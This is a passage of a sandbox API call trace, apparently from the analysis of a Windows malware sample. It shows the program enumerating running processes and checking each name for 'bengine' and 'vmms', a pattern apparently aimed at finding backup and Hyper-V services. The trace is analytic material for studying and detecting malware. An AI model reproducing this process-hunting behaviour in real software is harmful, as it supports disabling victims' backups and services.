lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0101.502] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="bengine") returned 0x0 [0101.502] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0101.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.502] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f300 [0101.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x356f300, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0101.503] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0101.503] StrStrIA (lpFirst="TiWorker.exe", lpSrch="bengine") returned 0x0 [0101.503] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 0 [0101.503] CloseHandle (hObject=0x350) returned 1 [0101.503] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0101.521] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.522] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357ef00 [0101.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357ef00, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0101.522] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0101.522] StrStrIA (lpFirst="[System Process]", lpSrch="vmms") returned 0x0 [0101.522] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0101.523] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x357e0b8 [0101.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x357e0b8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0101.523] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0101.523] StrStrIA (lpFirst="System", lpSrch="vmms") returned 0x0 [0101.523] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.524] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356f7f8 [0101.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x356f7f8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0101.525] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0101.525] StrStrIA (lpFirst="smss.exe", lpSrch="vmms") returned 0x0 [0101.525] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.526] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f7b0 [0101.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356f7b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0101.526] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0101.526] StrStrIA (lpFirst="csrss.exe", lpSrch="vmms") returned 0x0 [0101.526] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.555] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f810 [0101.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x356f810, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0101.555] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0101.555] StrStrIA (lpFirst="wininit.exe", lpSrch="vmms") returned 0x0 [0101.555] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.556] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f768 [0101.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356f768, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0101.556] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0101.556] StrStrIA (lpFirst="csrss.exe", lpSrch="vmms") returned 0x0 [0101.556] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.558] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f888 [0101.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x356f888, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0101.558] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0101.558] StrStrIA (lpFirst="winlogon.exe", lpSrch="vmms") returned 0x0 [0101.558] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.559] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f5b8 [0101.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x356f5b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0101.559] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0101.559] StrStrIA (lpFirst="services.exe", lpSrch="vmms") returned 0x0 [0101.559] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.561] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f5d0 [0101.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x356f5d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0101.561] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0101.561] StrStrIA (lpFirst="lsass.exe", lpSrch="vmms") returned 0x0 [0101.561] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.562] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f798 [0101.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f798, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.562] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.562] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.562] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0101.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.563] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356f870 [0101.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356f870, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0101.563] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0101.563] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="vmms") returned 0x0 [0101.563] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0101.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.565] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356f690 [0101.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356f690, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0101.565] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0101.565] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="vmms") returned 0x0 [0101.565] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.566] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f840 [0101.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.566] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.566] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.566] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0101.567] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e178 [0101.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e178, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0101.568] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0101.568] StrStrIA (lpFirst="dwm.exe", lpSrch="vmms") returned 0x0 [0101.568] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.569] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f7e0 [0101.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f7e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.569] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.569] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.569] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.570] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f5e8 [0101.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f5e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.570] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.570] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.570] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.572] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f780 [0101.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f780, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.572] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.572] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.572] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.573] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f708 [0101.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f708, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.573] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.573] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.573] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.574] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f660 [0101.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f660, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.575] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.575] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.575] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.576] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f678 [0101.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f678, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.576] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.576] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.576] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.577] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f6a8 [0101.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f6a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.577] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.577] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.577] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.579] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f5a0 [0101.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f5a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", 